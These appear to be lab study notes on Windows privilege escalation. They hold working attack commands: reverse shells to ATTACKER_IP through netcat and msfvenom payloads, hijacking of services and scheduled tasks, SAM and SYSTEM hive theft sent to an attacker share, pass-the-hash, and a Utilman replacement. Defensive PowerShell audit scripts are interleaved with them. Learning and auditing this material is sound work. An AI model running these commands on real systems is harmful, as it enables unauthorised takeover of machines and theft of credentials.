
Windows Privilege Escalation

Harvesting Passwords from Usual Spots

Unattended Windows Installations

  • Unattended installations use an administrator account for the initial setup, and its credentials might end up being stored on the machine in these locations:

    • C:\Unattend.xml

    • C:\Windows\Panther\Unattend.xml

    • C:\Windows\Panther\Unattend\Unattend.xml

    • C:\Windows\system32\sysprep.inf

    • C:\Windows\system32\sysprep\sysprep.xml

  • Within these files you might find credentials

<Credentials>
 <Username>Administrator</Username>
 <Domain>thm.local</Domain>
 <Password>MyPassword123</Password>
</Credentials>

PowerShell History

  • If a user runs a command that includes a password, it can be retrieved from the PowerShell history file with the following command:

# This will only work from cmd.exe 
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

  • Windows allows the use of other users' credentials. The command below lists saved credentials

cmdkey /list

# If you notice any credentials worth trying, use them with this command 
runas /savecred /user:admin cmd.exe

IIS Configuration

  • IIS config is stored in a file called web.config and can store passwords for databases or authentication mechanisms.

  • The file can be found here:

    • C:\inetpub\wwwroot\web.config

    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

  • A quick way to find database connection strings in the file:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve Credentials from PuTTY

  • PuTTY doesn't allow users to store their SSH password, but it will store proxy configurations that include cleartext authentication credentials

  • Command to retrieve stored proxy credentials

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
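The following PowerShell script is an added example (not part of the original notes) that sweeps the "usual spots" listed above from the defender's side: the unattended-install answer files, the PSReadline history file, the IIS web.config files and the PuTTY session keys. It reports where credential material is present without echoing the secrets, so it can be run as a hygiene check on a build before hand-over. The file paths are the ones from the notes; the `AdminPassword` key name for sysprep.inf and the `ProxyUsername`/`ProxyPassword` registry value names are assumptions about those formats.

```powershell
# Added example, not from the original notes: defender-side sweep of the "usual spots".
# Reports where credential material sits without printing the secrets themselves.

$UnattendPaths = @(
    'C:\Unattend.xml',
    'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml',
    'C:\Windows\system32\sysprep.inf',
    'C:\Windows\system32\sysprep\sysprep.xml'
)
$WebConfigPaths = @(
    'C:\inetpub\wwwroot\web.config',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config'
)

function Find-CredentialLeftovers {
    $findings = [System.Collections.Generic.List[object]]::new()
    function Add-Finding([string]$Where, [string]$What) {
        $findings.Add([pscustomobject]@{ Location = $Where; Indicator = $What })
    }

    # 1. Answer files: a <Password> element (XML) or an AdminPassword key (sysprep.inf,
    #    assumed key name) means the setup account's secret was left behind.
    foreach ($p in $UnattendPaths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $hits = Select-String -LiteralPath $p -Pattern '<Password>|AdminPassword'
        if ($hits) { Add-Finding $p "$(@($hits).Count) password element(s)" }
        else       { Add-Finding $p 'present, no password element (still worth removing)' }
    }

    # 2. PSReadline history: command lines that look like they carry a secret.
    $history = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
    if (Test-Path -LiteralPath $history) {
        $hits = Select-String -LiteralPath $history -Pattern 'password|passwd|pwd|secret|token|-p '
        foreach ($h in $hits) { Add-Finding $history "line $($h.LineNumber) looks like it carries a secret" }
    }

    # 3. IIS: connection strings with an inline password.
    foreach ($p in $WebConfigPaths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $hits = Select-String -LiteralPath $p -Pattern 'connectionString' |
                Where-Object { $_.Line -match 'password=|pwd=' }
        if ($hits) { Add-Finding $p "$(@($hits).Count) connection string(s) with an inline password" }
    }

    # 4. PuTTY sessions: ProxyUsername/ProxyPassword (assumed value names) hold the cleartext proxy logon.
    $sessions = Get-ChildItem -Path 'HKCU:\Software\SimonTatham\PuTTY\Sessions' -ErrorAction SilentlyContinue
    foreach ($s in $sessions) {
        $props = Get-ItemProperty -Path $s.PSPath
        if ($props.ProxyPassword) {
            Add-Finding $s.PSPath "proxy user '$($props.ProxyUsername)' has a stored password"
        }
    }
    return $findings
}

Find-CredentialLeftovers | Format-Table -AutoSize -Wrap
```

Run it in the context of the user whose profile you are reviewing, since the history file and the PuTTY keys live under that user's APPDATA and HKCU; the answer files and web.config paths are machine-wide and need read access to C:\Windows and C:\inetpub.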

Scheduled Tasks

  • Look for scheduled tasks that have either lost their binary or use a binary you can modify

# Retrieve detailed information 
schtasks /query /tn vulnask /fo list /v 

# We care about the "Task to Run" and "Run As User" parameters 

# Check file permissions of the Task to Run file 
icacls C:\tasks\schtask.bat

# If nc64.exe available we can use that to spawn a reverse shell 
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

# Start listener on attacker machine
nc -lvp 4444

AlwaysInstallElevated

  • Windows Installer files (.msi) usually run with the privilege level of the user that starts them.

  • They can be configured to run with higher privileges from any user account; this would allow us to generate a malicious MSI file that runs with admin privileges.

  • This method requires two registry values to be set. You can query them from the command line using the commands below:

reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer

# Both keys must report AlwaysInstallElevated set to 1 for this to work
# You can generate a malicious .msi file using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

# You should also run the Metasploit handler module.
# Once you have transferred the file you created, run the installer with this command and get the reverse shell
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Abusing Service Misconfigurations

Windows Services

  • Service Control Manager (SCM) is a process in charge of managing the state of services as needed

# Get service configuration
sc qc SERVICE_NAME

# Service configurations are stored in the registry under
HKLM\SYSTEM\CurrentControlSet\Services\

Insecure Permissions on Service Executable

  • If the executable associated with a service has weak permissions that allow us to modify or replace it, we gain the privileges of the service's account

# Query the service configuration (note BINARY_PATH_NAME and SERVICE_START_NAME)
sc qc WindowsScheduler

# Check permissions on the executable
icacls BINARY_PATH_NAME

# Generate an exe-service payload using msfvenom and serve it through a Python web server
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
python3 -m http.server

# Pull the payload onto the victim machine using PowerShell (wget is an alias of Invoke-WebRequest)
wget http://ATTACKER_IP:8000/rev-svc.exe -OutFile rev-svc.exe

# Replace the service executable with our payload (run from the directory in BINARY_PATH_NAME)
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

# Restart the service so the new binary runs (a listener on port 4445 must be waiting)
sc stop WindowsScheduler
sc start WindowsScheduler

Unquoted Service Paths

  • A particular behavior occurs when a service is configured to point to an "unquoted" executable: the path of the associated executable isn't properly quoted to account for spaces in the command.

  • When the SCM tries to execute the associated binary, a problem arises. Since there are spaces in the name of the "Disk Sorter Enterprise" folder, the command becomes ambiguous, and the SCM doesn't know which of the following you are trying to execute.

  • This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators unless they are part of a quoted string. This means the "right" interpretation of the unquoted command would be to execute C:\MyPrograms\Disk.exe and take the rest as arguments.

  • Instead of failing as it probably should, the SCM tries to help the user and searches for each of the binaries in the following order:

  1. First, search for C:\MyPrograms\Disk.exe. If it exists, the service will run this executable.

  2. If that doesn't exist, search for C:\MyPrograms\Disk Sorter.exe. If it exists, the service will run this executable.

  3. If that doesn't exist, search for C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe. This option is expected to succeed and is what runs in a default installation.

# Create payload using msfvenom 
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe 

# Move payload and grant permissions 
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F

# restart service 
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"

  • If the binaries are installed in a non-default path that is world-writable (anything other than C:\Program Files or C:\Program Files (x86)), the vulnerability can be exploited.

    • For example, C:\MyPrograms inherits the permissions of the C:\ directory, which allows any user to create files and folders in it.

  • The process of creating a payload with msfvenom is the same as before.

Insecure Service Permissions

  • If the service DACL (not the service executable's DACL) lets you modify the configuration of a service, then you can reconfigure the service

  • This lets you point it to any executable and run it with the account you prefer.

# You can check a service DACL from the CLI using accesschk
# accesschk is included in the Sysinternals suite
accesschk64.exe -qlc thmservice

# If the Users group has SERVICE_ALL_ACCESS permission, any user can reconfigure the service

# Create msfvenom payload 
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe

# start listener in attacker
nc -lvp 4447

# transfer payload using python and wget 

# Grant permissions to Everyone to execute the payload
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F

# Change the service's associated executable and account 
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem

# We choose to use LocalSystem account because it is the highest privileged account 

# Trigger payload 
sc stop THMService
sc start THMService
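The PowerShell script below is an added example (not from the original notes, nor from any tool the notes mention) that audits a host for the misconfigurations covered in the Scheduled Tasks, AlwaysInstallElevated and service sections above, so that an administrator can find and fix them before an attacker does. It reproduces the SCM search order described for unquoted paths as a small function and applies the same "is this writable by a low-privileged principal?" test to service binaries, unquoted-path directories and scheduled-task binaries. The list of low-privileged principals and the set of rights treated as dangerous are my choices, not something the notes define.

```powershell
# Added example, not part of the original notes: audit a host for the misconfigurations
# described in the Scheduled Tasks, AlwaysInstallElevated and service sections, from a
# hardening perspective. Run in an elevated PowerShell 5.1+ session; the scheduled-task
# part needs the ScheduledTasks module (Windows 8 / Server 2012 onwards).

# Principals that should never be able to modify something that runs with higher privileges.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Test-LowPrivWritable {
    param([string]$Path)
    # True when a low-privileged principal can modify the object itself (not just its children).
    $dangerous = [int][System.Security.AccessControl.FileSystemRights]'WriteData, Delete, TakeOwnership, ChangePermissions'
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $rule.IdentityReference.Value) { continue }
        # InheritOnly rules apply to children, not to this object (e.g. the Modify entry on C:\)
        if ($rule.PropagationFlags.HasFlag([System.Security.AccessControl.PropagationFlags]::InheritOnly)) { continue }
        if (([int]$rule.FileSystemRights -band $dangerous) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedPathCandidates {
    param([string]$PathName)
    # Mirrors the SCM search order from the notes: each space-delimited prefix before the real
    # executable becomes a candidate with ".exe" appended, so
    # "C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe" yields
    # "C:\MyPrograms\Disk.exe" and "C:\MyPrograms\Disk Sorter.exe".
    if (-not $PathName -or $PathName.StartsWith('"')) { return @() }
    $parts = $PathName -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $prefix = $parts[0..($i - 1)] -join ' '
        if ($prefix -match '\.exe$') { break }   # reached the real executable; the rest are arguments
        $candidates += "$prefix.exe"
    }
    return $candidates
}

function Get-ExecutableFromCommand {
    param([string]$CommandLine)
    # Quoted path: take what is inside the quotes; otherwise everything up to the first ".exe".
    if ($CommandLine -match '^"([^"]+)"') { return $Matches[1] }
    if ($CommandLine -match '^(.*?\.exe)') { return $Matches[1] }
    return $null
}

function Invoke-PrivescSurfaceAudit {
    $findings = [System.Collections.Generic.List[object]]::new()
    function Report($Kind, $Name, $Detail) {
        $findings.Add([pscustomobject]@{ Kind = $Kind; Name = $Name; Detail = $Detail })
    }

    # AlwaysInstallElevated: the MSI trick needs the value set to 1 under both hives.
    $hkcu = Get-ItemProperty 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -ErrorAction SilentlyContinue
    $hklm = Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -ErrorAction SilentlyContinue
    if ($hkcu.AlwaysInstallElevated -eq 1 -and $hklm.AlwaysInstallElevated -eq 1) {
        Report 'AlwaysInstallElevated' 'Windows Installer policy' 'enabled in both HKCU and HKLM'
    }

    # Services: unquoted paths with a writable directory on the search path, and writable binaries.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        foreach ($cand in Get-UnquotedPathCandidates $svc.PathName) {
            $dir = Split-Path -Parent $cand
            if ($dir -and (Test-Path -LiteralPath $dir) -and (Test-LowPrivWritable $dir)) {
                Report 'UnquotedServicePath' $svc.Name "$cand could be planted; service runs as $($svc.StartName)"
            }
        }
        $exe = Get-ExecutableFromCommand $svc.PathName
        if ($exe) { $exe = [Environment]::ExpandEnvironmentVariables($exe) }
        if ($exe -and (Test-Path -LiteralPath $exe) -and (Test-LowPrivWritable $exe)) {
            Report 'WritableServiceBinary' $svc.Name "$exe is writable; service runs as $($svc.StartName)"
        }
    }

    # Scheduled tasks: the "Task To Run" icacls check from the notes, automated.
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if ((Test-Path -LiteralPath $exe) -and (Test-LowPrivWritable $exe)) {
                Report 'WritableTaskBinary' $task.TaskName "$exe is writable; task runs as $($task.Principal.UserId)"
            }
        }
    }
    return $findings
}

Invoke-PrivescSurfaceAudit | Format-Table -AutoSize -Wrap
```

Each finding names the service or task and the account it runs as, which is what decides the severity: a writable binary behind a service running as LocalSystem is the case the notes describe, while one running as a dedicated low-privileged account is a lesser problem. Fixing the unquoted-path class is a matter of quoting the path (`sc config NAME binPath= "\"C:\path with spaces\svc.exe\""`) and tightening the directory ACL.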

Abusing Dangerous Privileges

Windows Privileges

# Check user privileges 
whoami /priv

SeBackup / SeRestore

  • Allows users to read and write to any file in the system, ignoring any DACL in place

  • Allows certain users to perform backups from a system without needing full admin privileges

  • We can escalate privileges by copying the SAM and SYSTEM registry hives and extracting the local Administrator's password hash from them

# Check privileges 
whoami /priv

# Backup SAM and SYSTEM hashes 
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

# Copy the files to the attacker machine using SMB or another available method
# For SMB, we can use smbserver.py to start a simple SMB server with a network share in a directory on the attacker machine
mkdir share
# This creates a share named public pointing to the share directory and requires the username and password of the current Windows session
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

# Use the copy command in target machine to transfer files to your attack box 
copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public

# Use impacket to get password hashes 
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL 

# Use the Administrator hash to perform a pass-the-hash attack and gain access to the target machine with SYSTEM privileges
python3.9 /opt/impacket/examples/psexec.py -hashes ADMIN_HASH administrator@TARGET_IP 

# Check you get SYSTEM privileges 
whoami 

SeTakeOwnership

  • Allows users to take ownership of any object on the system, including files and registry keys

  • Opens up possibilities for an attacker to elevate privileges. For example, search for a service running as SYSTEM and take over the service's executable

# Check privileges 
whoami /priv

# Abuse utilman.exe - a built-in Windows app that provides Ease of Access options on the lock screen
# Utilman runs with SYSTEM privileges, so we gain SYSTEM privileges if we replace the original binary with any payload we like

# Replace utilman by first taking ownership of it
takeown /f C:\Windows\System32\Utilman.exe

# Being the owner of a file doesn't mean you have privileges over it
# Give your user full permissions over utilman.exe using this command:
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F

# Replace utilman.exe with a copy of cmd.exe
copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe

# Trigger utilman by locking the screen from the Start menu
# Click the Ease of Access button, which runs utilman.exe with SYSTEM privileges
# Since we replaced it with cmd.exe we get a command prompt with SYSTEM privileges

SeImpersonate / SeAssignPrimaryToken

  • Allows a process to impersonate other users and act on their behalf

  • Usually consists of being able to spawn a process or thread under the security context of another user

  • As attackers, if we can take control of a process with the SeImpersonate or SeAssignPrimaryToken privilege, we can impersonate any user connecting and authenticating to that process

  • The LOCAL SERVICE and NETWORK SERVICE accounts already have such privileges

  • Things we need in order to elevate privileges:

  1. Spawn a process that users can connect and authenticate to, so that impersonation can occur

  2. Find a way to force privileged users to connect and authenticate to the spawned malicious process

# Use the RogueWinRM exploit to satisfy both conditions
# Assume we already compromised a website running on IIS and planted a web shell
# Use the web shell to check the assigned privileges of the compromised account and confirm we have both privileges of interest

# The RogueWinRM exploit is possible because whenever a user (even an unprivileged one) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges
# Port 5985 is simply a port that exposes a PowerShell console
# Think of it as SSH but using PowerShell

# If WinRM isn't running on the victim server, an attacker can
# start a fake WinRM service on port 5985 and catch the
# authentication attempt made by the BITS service
# If the attacker has the SeImpersonate privilege, they
# can execute any command on behalf of the connecting user,
# which is SYSTEM

# Trigger RogueWinRM using the web shell
C:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"
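As an added example (not part of the original notes), the PowerShell script below looks at the same three privilege families from the defender's side: it lists which accounts have been granted SeBackup/SeRestore, SeTakeOwnership and SeImpersonate/SeAssignPrimaryToken by the local security policy, checks whether Utilman.exe is still the genuine binary, and reports what owns TCP port 5985. The expected `OriginalFilename` of the genuine Utilman.exe is an assumption; the parsing of `secedit` output and the PID 4 rule for HTTP.sys are facts about Windows.

```powershell
# Added example, not part of the original notes: inventory the dangerous privileges above
# from the defender's side. Run elevated (secedit needs it to export the local policy).

$DangerousPrivileges = @('SeBackupPrivilege', 'SeRestorePrivilege', 'SeTakeOwnershipPrivilege',
                         'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege')

function Get-PrivilegeHolders {
    # Exports the local security policy with secedit and parses its [Privilege Rights]
    # section, where each line reads "SeXxxPrivilege = *SID,*SID,...".
    $cfg = Join-Path $env:TEMP 'secpol-audit.inf'
    secedit /export /cfg $cfg /quiet | Out-Null
    $holders = @{}
    foreach ($line in Get-Content -LiteralPath $cfg) {
        if ($line -match '^(Se\w+Privilege)\s*=\s*(.+)$' -and $DangerousPrivileges -contains $Matches[1]) {
            $priv = $Matches[1]
            $entries = $Matches[2] -split ','
            $accounts = foreach ($entry in $entries) {
                $sid = $entry.Trim().TrimStart('*')
                try { ([System.Security.Principal.SecurityIdentifier]$sid).Translate([System.Security.Principal.NTAccount]).Value }
                catch { $sid }   # orphaned or non-SID entry: keep it as written
            }
            $holders[$priv] = @($accounts)
        }
    }
    Remove-Item -LiteralPath $cfg -ErrorAction SilentlyContinue
    return $holders
}

function Test-UtilmanIntegrity {
    # Utilman.exe launches as SYSTEM from the lock screen. A cmd.exe copied over it still has a
    # valid Microsoft signature, so the signature alone proves nothing; the version resource's
    # OriginalFilename (assumed to read "UtilMan.exe" for the genuine file) is checked as well.
    $path = Join-Path $env:SystemRoot 'System32\Utilman.exe'
    $sig  = Get-AuthenticodeSignature -FilePath $path
    $orig = (Get-Item -LiteralPath $path).VersionInfo.OriginalFilename
    [pscustomobject]@{
        Path             = $path
        SignatureStatus  = $sig.Status
        OriginalFilename = $orig
        LooksGenuine     = ($sig.Status -eq 'Valid' -and $orig -ieq 'utilman.exe')
    }
}

function Get-WinRmPortOwner {
    # WinRM listens through HTTP.sys, so a legitimate 5985 listener is owned by the System
    # process (PID 4). No listener at all is the state RogueWinRM relies on; a listener owned
    # by any other process is a fake WinRM endpoint until proven otherwise.
    $l = Get-NetTCPConnection -LocalPort 5985 -State Listen -ErrorAction SilentlyContinue | Select-Object -First 1
    if (-not $l) { return [pscustomobject]@{ Listening = $false; OwnerPid = $null; Owner = $null; Suspicious = $false } }
    [pscustomobject]@{
        Listening  = $true
        OwnerPid   = $l.OwningProcess
        Owner      = (Get-Process -Id $l.OwningProcess -ErrorAction SilentlyContinue).ProcessName
        Suspicious = ($l.OwningProcess -ne 4)
    }
}

$holders = Get-PrivilegeHolders
foreach ($priv in $DangerousPrivileges) {
    '{0,-30} {1}' -f $priv, ($holders[$priv] -join ', ')
}
Test-UtilmanIntegrity | Format-List
Get-WinRmPortOwner | Format-List
```

The privilege listing is the part worth scheduling: SeBackupPrivilege or SeRestorePrivilege granted to a group that ordinary users belong to is equivalent to local admin, and service accounts that do not need to impersonate clients should not hold SeImpersonatePrivilege. A 5985 listener owned by anything other than PID 4 while WinRM is not installed is worth an immediate look at that process.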

Abusing vulnerable software

Unpatched Software

  • Use the wmic tool to list the software installed on the target system and its versions

# This command dumps the information it can gather on installed software
wmic product get name,version,vendor

  • Search online (e.g. exploit-db, packet storm) for existing exploits for the installed software

Tools of the Trade

WinPEAS

  • Script developed to enumerate the target system to uncover privilege escalation paths

PrivescCheck

  • PowerShell script that searches for common privilege escalation paths on the target system

  • To run PrivescCheck on the target system, you might need to bypass the execution policy restrictions using Set-ExecutionPolicy Bypass -Scope process -Force

WES-NG

  • Avoids making unnecessary noise that can attract attention because it runs on your attacking machine

  • Before using it, run wes.py --update to update the database

  • To use the script, run the systeminfo command on the target system

  • Direct the output to a .txt file that you will need to move to your attacking machine

# Run wes.py
wes.py systeminfo.txt
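The PowerShell below is an added example (not from the original notes or from the WES-NG project) that prepares the input the Unpatched Software steps call for. It writes the systeminfo output that wes.py consumes and builds the installed-software inventory from the Uninstall registry keys instead of `wmic product`: the Win32_Product class behind that command makes Windows Installer re-validate, and sometimes repair, every MSI package it enumerates, which is slow and leaves event-log noise on a live host. The output directory is my choice.

```powershell
# Added example, not part of the original notes: build the inventory the steps above need.

function Get-InstalledSoftware {
    # 64-bit, 32-bit (WOW6432Node) and per-user installs all register under an Uninstall key.
    $uninstallKeys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        Select-Object @{ n = 'Name';    e = { $_.DisplayName } },
                      @{ n = 'Version'; e = { $_.DisplayVersion } },
                      @{ n = 'Vendor';  e = { $_.Publisher } } |
        Sort-Object Name -Unique
}

# wes.py consumes the raw systeminfo output; keep it as plain text next to the inventory.
$outDir = Join-Path $env:TEMP 'patch-audit'
New-Item -ItemType Directory -Path $outDir -Force | Out-Null
systeminfo | Out-File -FilePath (Join-Path $outDir 'systeminfo.txt') -Encoding utf8
Get-InstalledSoftware | Export-Csv -Path (Join-Path $outDir 'software.csv') -NoTypeInformation
Get-InstalledSoftware | Format-Table -AutoSize
"Files written to $outDir; move systeminfo.txt to the attacking machine and run: wes.py systeminfo.txt"
```

The CSV gives you name, version and vendor for the third-party software that wes.py does not cover (it only knows Microsoft patches), which is what the "search for existing exploits" step above is about.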

Last updated 1 year ago

A complete list of available privileges on Windows systems is available online.

You can find a comprehensive list of exploitable privileges on the Priv2Admin GitHub project.
